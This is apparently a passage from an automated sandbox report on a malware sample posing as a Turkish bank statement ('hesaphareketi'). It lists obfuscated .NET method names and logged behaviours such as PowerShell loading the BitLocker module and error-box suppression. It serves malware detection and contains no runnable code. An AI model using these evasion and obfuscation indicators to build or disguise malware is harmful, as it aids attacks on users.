                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, aVOQLr86BIZOs4JD1e.csHigh entropy of concatenated method names: 'Dispose', 'xEo6RcE1hn', 'ofjptkc40Y', 'DicFF3wBv9', 'k4c6FccKvO', 'CqN6zEDDbf', 'ProcessDialogKey', 'cOCpaXcL7h', 'gMPp6uGRUd', 'NfjppYxtK5'
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, DeAfCSDBU9yLGhUV22.csHigh entropy of concatenated method names: 'FRDAmdgBCW', 'kdTAojAMPe', 'v7QuHgLoUd', 'C8iu2RpDhy', 'FFyuQTx5tY', 'NgBuZMrGn3', 'Ldku1QceXT', 'CIyuJXm5W6', 'bIqugSbYYW', 'DIiufs1CYU'
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, jSRXYtvBwkQC7BKMXG.csHigh entropy of concatenated method names: 'R5RsKuZgC9', 'bR2s8QGSBd', 'SRHsAwEpve', 'mNjsYSbm6s', 'QVWsjNGdRa', 'E2lAxfvA58', 'St7AwCF7fc', 'kiMAGTANPx', 'uejAB378SJ', 'no6AReu0IU'
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, M3Tk9D7EuWvvcB5aAS.csHigh entropy of concatenated method names: 'ToString', 'ALrcdGVykS', 'Qt2ctf4S0O', 'KnLcHGU4XW', 'Ph2c2iagvq', 'xX7cQjluuu', 'V6bcZVZ0yt', 'bBuc1pXpqj', 'yQQcJiR1O2', 'P6xcgAsq09'
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, NOSfVqqeoph6EVZH5u.csHigh entropy of concatenated method names: 'vOlhVP8XEc', 'NFJhlOywTT', 'ToString', 'ctjhyQNq4q', 'SJyh8NMT3M', 'mkyhuF1B7I', 'HZohAaLoZa', 'zIChsRum2K', 'dZihYAaoPS', 'omuhjwkY6F'
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, oM3yqP0pdOqJtt0hwo.csHigh entropy of concatenated method names: 'Gdv6YxasrE', 'bbt6jbl4Zl', 'ahb6VN4WJe', 'GrB6lNbeAf', 'qUV6922YSR', 'wYt6cBwkQC', 'gamWHa5xZQiT4hOarQ', 'okWpYddVd96LG4v2S1', 'iaW9tS6kBOO8bOXSOd', 'IsE66JAq8f'
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, jxtK5RFj1Y2g2eJ6Jh.csHigh entropy of concatenated method names: 'IO6N618GSK', 'C0ZNS3cnN5', 'IIMN08VWhk', 'VeJNybVTRi', 'Tb0N8YFRUg', 'BTbNAv1Tbe', 'TsONsK3l3g', 'ywxiGAoq1y', 'pu1iBtwN9s', 'spjiRLZvqZ'
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, xxMJ9R6aIbQ1FxVAIOn.csHigh entropy of concatenated method names: 'C27Ne3d7Ve', 'w91NMaPoBf', 'pFmNrjkkN7', 'xL3NUMi86Q', 'oyQNm1Uf3g', 'k7yNIn1ciE', 'mnPNoRCClQ', 'XKJNbTX1pZ', 'BbWNTi85cE', 'EbtNDahjaI'
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, yvnqjZuT3Mj4EaRnjM.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'F4HpR82jn4', 'zJcpFsKgvf', 'M59pz0KFTX', 'wWOSaMMrwK', 'jTsS6cIxdH', 'SQ1Sp5fZgu', 'endSSjp6XL', 'tiDy9xyeQbAnAum0njx'
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, rQMVFf4JGsgCQU071W.csHigh entropy of concatenated method names: 'v8WEbTYsD3', 'cxOETM3Kke', 'VbMEvOWJPQ', 'vWeEtidKZC', 'vV5E27yd4A', 'FimEQW2XG8', 'F76E1s2xpM', 'A6JEJx1YqO', 'NxAEfHrmE4', 'zRIEdDmtvY'
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, j2A3akwxX8ZEUCuPhW.csHigh entropy of concatenated method names: 'AvLhB5oiZ5', 'NbchFoshMe', 'peiiacQI6a', 'domi6oqhlp', 'PmlhdYJwnQ', 'HQLhLvjj3y', 'su1h4c8BAU', 'xEEh3sBWI4', 'j5phOaqt2i', 'LbQh7FMMcl'
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, lXcL7hR8MPuGRUdffj.csHigh entropy of concatenated method names: 's9BivdlkwL', 'GgRitCkbmb', 'XZOiHqBnXQ', 'RXyi2Ey2MV', 'LA6i3Yh0uU', 'lqJiQq0qX8', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, yrtDJ8zlG303A4dPlO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ALVNEC8gOQ', 'XRwN9Z43Yw', 'NmUNc9563O', 'y2nNhORViA', 'CH4NiPScgb', 'YeLNNWbrY5', 'Fc1NnonUSd'
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, GxasrEb6btbl4ZlyPy.csHigh entropy of concatenated method names: 'EuP83RttDC', 'MKI8OaIgR1', 'f9387Z1ELR', 'GQe8qlEtGP', 'Wew8xtix22', 'CWn8wlsGcM', 'sD28GtnWVw', 'o5l8BXCGhr', 'daJ8R0VtlF', 'dxa8FXgBo6'
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, QcccKvBOIqNEDDbfSO.csHigh entropy of concatenated method names: 'CB1iydUHER', 'z1yi8qtpG4', 'PpCiuGPYUX', 'DTriACk9Fs', 'YLFisWLROX', 'EbKiY0F5uY', 'KlSijg1RtP', 'HupiC7LRfb', 'IIQiV8JTIg', 'HWPilGcqGd'
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, kMIvxVgMnZ8X3ijAoI.csHigh entropy of concatenated method names: 'UW2YeUJBcb', 'VVAYMCNJqi', 'M6HYrjydNa', 'FWNYU1iLD4', 'yWAYmU0HDU', 'WwmYIFfr3w', 'GNcYocupWU', 'y7QYbpj7J6', 'BUqYT8JqmW', 'CBsYDZVKcB'
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, xCkofu1qgWKeqdhGVy.csHigh entropy of concatenated method names: 'FYoYy9Lj8n', 'o5dYuNKuhd', 'j3hYskXoN7', 'cZ3sFSCSWD', 'dWiszAQM0N', 'fVvYaXfKv2', 'vHoY67CsLQ', 'bJUYpsnYeQ', 'myBYSA3ldu', 'C8fY0C9D0Y'
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, vZ1DdYpttd7fpYi8k2.csHigh entropy of concatenated method names: 'gWgrPBkwy', 'XPlUwRVLq', 'AtbITuMj9', 'imvot8Ti7', 'KhfTwQMyI', 'EC0DIYwt1', 'q3TdwSbKKiiS2sSNZ9', 'HR3QW94b2cVrXsghQt', 'wfZiEGYkZ', 'WI3nC8aZQ'
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, qZS5oaThbN4WJevrBN.csHigh entropy of concatenated method names: 'PsKuUGcJGs', 'Tm7uI8PeTJ', 'Nhiublk2KA', 'kavuT2wbD1', 'neiu9bcYjN', 'JOIuchXU8h', 'KH9uhYyRDK', 'J6IuisQo9a', 'm8cuNJHmfC', 'iBpunZxOEY'
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, pMceRfjydasvB3AEin.csHigh entropy of concatenated method names: 'EDvSKvsv6N', 'BSYSypaGai', 'Od4S8VDUgi', 'b9RSujQt9T', 'fOmSAf4kJ1', 'VvPSsiVrfU', 'rjKSY1qNgU', 'IPbSjg1ys3', 'DR8SCoH2v3', 'tQ6SVwo9ep'
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, aVOQLr86BIZOs4JD1e.csHigh entropy of concatenated method names: 'Dispose', 'xEo6RcE1hn', 'ofjptkc40Y', 'DicFF3wBv9', 'k4c6FccKvO', 'CqN6zEDDbf', 'ProcessDialogKey', 'cOCpaXcL7h', 'gMPp6uGRUd', 'NfjppYxtK5'
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, DeAfCSDBU9yLGhUV22.csHigh entropy of concatenated method names: 'FRDAmdgBCW', 'kdTAojAMPe', 'v7QuHgLoUd', 'C8iu2RpDhy', 'FFyuQTx5tY', 'NgBuZMrGn3', 'Ldku1QceXT', 'CIyuJXm5W6', 'bIqugSbYYW', 'DIiufs1CYU'
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, jSRXYtvBwkQC7BKMXG.csHigh entropy of concatenated method names: 'R5RsKuZgC9', 'bR2s8QGSBd', 'SRHsAwEpve', 'mNjsYSbm6s', 'QVWsjNGdRa', 'E2lAxfvA58', 'St7AwCF7fc', 'kiMAGTANPx', 'uejAB378SJ', 'no6AReu0IU'
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, M3Tk9D7EuWvvcB5aAS.csHigh entropy of concatenated method names: 'ToString', 'ALrcdGVykS', 'Qt2ctf4S0O', 'KnLcHGU4XW', 'Ph2c2iagvq', 'xX7cQjluuu', 'V6bcZVZ0yt', 'bBuc1pXpqj', 'yQQcJiR1O2', 'P6xcgAsq09'
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, NOSfVqqeoph6EVZH5u.csHigh entropy of concatenated method names: 'vOlhVP8XEc', 'NFJhlOywTT', 'ToString', 'ctjhyQNq4q', 'SJyh8NMT3M', 'mkyhuF1B7I', 'HZohAaLoZa', 'zIChsRum2K', 'dZihYAaoPS', 'omuhjwkY6F'
                  Source: 0.2.hesaphareketi__20241001.exe.a710000.6.raw.unpack, oM3yqP0pdOqJtt0hwo.csHigh entropy of concatenated method names: 'Gdv6YxasrE', 'bbt6jbl4Zl', 'ahb6VN4WJe', 'GrB6lNbeAf', 'qUV6922YSR', 'wYt6cBwkQC', 'gamWHa5xZQiT4hOarQ', 'okWpYddVd96LG4v2S1', 'iaW9tS6kBOO8bOXSOd', 'IsE66JAq8f'
                  Source: 0.2.hesaphareketi__20241001.exe.a710000.6.raw.unpack, jxtK5RFj1Y2g2eJ6Jh.csHigh entropy of concatenated method names: 'IO6N618GSK', 'C0ZNS3cnN5', 'IIMN08VWhk', 'VeJNybVTRi', 'Tb0N8YFRUg', 'BTbNAv1Tbe', 'TsONsK3l3g', 'ywxiGAoq1y', 'pu1iBtwN9s', 'spjiRLZvqZ'
                  Source: 0.2.hesaphareketi__20241001.exe.a710000.6.raw.unpack, xxMJ9R6aIbQ1FxVAIOn.csHigh entropy of concatenated method names: 'C27Ne3d7Ve', 'w91NMaPoBf', 'pFmNrjkkN7', 'xL3NUMi86Q', 'oyQNm1Uf3g', 'k7yNIn1ciE', 'mnPNoRCClQ', 'XKJNbTX1pZ', 'BbWNTi85cE', 'EbtNDahjaI'
                  Source: 0.2.hesaphareketi__20241001.exe.a710000.6.raw.unpack, yvnqjZuT3Mj4EaRnjM.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'F4HpR82jn4', 'zJcpFsKgvf', 'M59pz0KFTX', 'wWOSaMMrwK', 'jTsS6cIxdH', 'SQ1Sp5fZgu', 'endSSjp6XL', 'tiDy9xyeQbAnAum0njx'
                  Source: 0.2.hesaphareketi__20241001.exe.a710000.6.raw.unpack, rQMVFf4JGsgCQU071W.csHigh entropy of concatenated method names: 'v8WEbTYsD3', 'cxOETM3Kke', 'VbMEvOWJPQ', 'vWeEtidKZC', 'vV5E27yd4A', 'FimEQW2XG8', 'F76E1s2xpM', 'A6JEJx1YqO', 'NxAEfHrmE4', 'zRIEdDmtvY'
                  Source: 0.2.hesaphareketi__20241001.exe.a710000.6.raw.unpack, j2A3akwxX8ZEUCuPhW.csHigh entropy of concatenated method names: 'AvLhB5oiZ5', 'NbchFoshMe', 'peiiacQI6a', 'domi6oqhlp', 'PmlhdYJwnQ', 'HQLhLvjj3y', 'su1h4c8BAU', 'xEEh3sBWI4', 'j5phOaqt2i', 'LbQh7FMMcl'
                  Source: 0.2.hesaphareketi__20241001.exe.a710000.6.raw.unpack, lXcL7hR8MPuGRUdffj.csHigh entropy of concatenated method names: 's9BivdlkwL', 'GgRitCkbmb', 'XZOiHqBnXQ', 'RXyi2Ey2MV', 'LA6i3Yh0uU', 'lqJiQq0qX8', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.hesaphareketi__20241001.exe.a710000.6.raw.unpack, yrtDJ8zlG303A4dPlO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ALVNEC8gOQ', 'XRwN9Z43Yw', 'NmUNc9563O', 'y2nNhORViA', 'CH4NiPScgb', 'YeLNNWbrY5', 'Fc1NnonUSd'
                  Source: 0.2.hesaphareketi__20241001.exe.a710000.6.raw.unpack, GxasrEb6btbl4ZlyPy.csHigh entropy of concatenated method names: 'EuP83RttDC', 'MKI8OaIgR1', 'f9387Z1ELR', 'GQe8qlEtGP', 'Wew8xtix22', 'CWn8wlsGcM', 'sD28GtnWVw', 'o5l8BXCGhr', 'daJ8R0VtlF', 'dxa8FXgBo6'
                  Source: 0.2.hesaphareketi__20241001.exe.a710000.6.raw.unpack, QcccKvBOIqNEDDbfSO.csHigh entropy of concatenated method names: 'CB1iydUHER', 'z1yi8qtpG4', 'PpCiuGPYUX', 'DTriACk9Fs', 'YLFisWLROX', 'EbKiY0F5uY', 'KlSijg1RtP', 'HupiC7LRfb', 'IIQiV8JTIg', 'HWPilGcqGd'
                  Source: 0.2.hesaphareketi__20241001.exe.a710000.6.raw.unpack, kMIvxVgMnZ8X3ijAoI.csHigh entropy of concatenated method names: 'UW2YeUJBcb', 'VVAYMCNJqi', 'M6HYrjydNa', 'FWNYU1iLD4', 'yWAYmU0HDU', 'WwmYIFfr3w', 'GNcYocupWU', 'y7QYbpj7J6', 'BUqYT8JqmW', 'CBsYDZVKcB'
                  Source: 0.2.hesaphareketi__20241001.exe.a710000.6.raw.unpack, xCkofu1qgWKeqdhGVy.csHigh entropy of concatenated method names: 'FYoYy9Lj8n', 'o5dYuNKuhd', 'j3hYskXoN7', 'cZ3sFSCSWD', 'dWiszAQM0N', 'fVvYaXfKv2', 'vHoY67CsLQ', 'bJUYpsnYeQ', 'myBYSA3ldu', 'C8fY0C9D0Y'
                  Source: 0.2.hesaphareketi__20241001.exe.a710000.6.raw.unpack, vZ1DdYpttd7fpYi8k2.csHigh entropy of concatenated method names: 'gWgrPBkwy', 'XPlUwRVLq', 'AtbITuMj9', 'imvot8Ti7', 'KhfTwQMyI', 'EC0DIYwt1', 'q3TdwSbKKiiS2sSNZ9', 'HR3QW94b2cVrXsghQt', 'wfZiEGYkZ', 'WI3nC8aZQ'
                  Source: 0.2.hesaphareketi__20241001.exe.a710000.6.raw.unpack, qZS5oaThbN4WJevrBN.csHigh entropy of concatenated method names: 'PsKuUGcJGs', 'Tm7uI8PeTJ', 'Nhiublk2KA', 'kavuT2wbD1', 'neiu9bcYjN', 'JOIuchXU8h', 'KH9uhYyRDK', 'J6IuisQo9a', 'm8cuNJHmfC', 'iBpunZxOEY'
                  Source: 0.2.hesaphareketi__20241001.exe.a710000.6.raw.unpack, pMceRfjydasvB3AEin.csHigh entropy of concatenated method names: 'EDvSKvsv6N', 'BSYSypaGai', 'Od4S8VDUgi', 'b9RSujQt9T', 'fOmSAf4kJ1', 'VvPSsiVrfU', 'rjKSY1qNgU', 'IPbSjg1ys3', 'DR8SCoH2v3', 'tQ6SVwo9ep'
                  Source: 0.2.hesaphareketi__20241001.exe.a710000.6.raw.unpack, aVOQLr86BIZOs4JD1e.csHigh entropy of concatenated method names: 'Dispose', 'xEo6RcE1hn', 'ofjptkc40Y', 'DicFF3wBv9', 'k4c6FccKvO', 'CqN6zEDDbf', 'ProcessDialogKey', 'cOCpaXcL7h', 'gMPp6uGRUd', 'NfjppYxtK5'
                  Source: 0.2.hesaphareketi__20241001.exe.a710000.6.raw.unpack, DeAfCSDBU9yLGhUV22.csHigh entropy of concatenated method names: 'FRDAmdgBCW', 'kdTAojAMPe', 'v7QuHgLoUd', 'C8iu2RpDhy', 'FFyuQTx5tY', 'NgBuZMrGn3', 'Ldku1QceXT', 'CIyuJXm5W6', 'bIqugSbYYW', 'DIiufs1CYU'
                  Source: 0.2.hesaphareketi__20241001.exe.a710000.6.raw.unpack, jSRXYtvBwkQC7BKMXG.csHigh entropy of concatenated method names: 'R5RsKuZgC9', 'bR2s8QGSBd', 'SRHsAwEpve', 'mNjsYSbm6s', 'QVWsjNGdRa', 'E2lAxfvA58', 'St7AwCF7fc', 'kiMAGTANPx', 'uejAB378SJ', 'no6AReu0IU'
                  Source: 0.2.hesaphareketi__20241001.exe.a710000.6.raw.unpack, M3Tk9D7EuWvvcB5aAS.csHigh entropy of concatenated method names: 'ToString', 'ALrcdGVykS', 'Qt2ctf4S0O', 'KnLcHGU4XW', 'Ph2c2iagvq', 'xX7cQjluuu', 'V6bcZVZ0yt', 'bBuc1pXpqj', 'yQQcJiR1O2', 'P6xcgAsq09'
                  Source: 0.2.hesaphareketi__20241001.exe.a710000.6.raw.unpack, NOSfVqqeoph6EVZH5u.csHigh entropy of concatenated method names: 'vOlhVP8XEc', 'NFJhlOywTT', 'ToString', 'ctjhyQNq4q', 'SJyh8NMT3M', 'mkyhuF1B7I', 'HZohAaLoZa', 'zIChsRum2K', 'dZihYAaoPS', 'omuhjwkY6F'

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
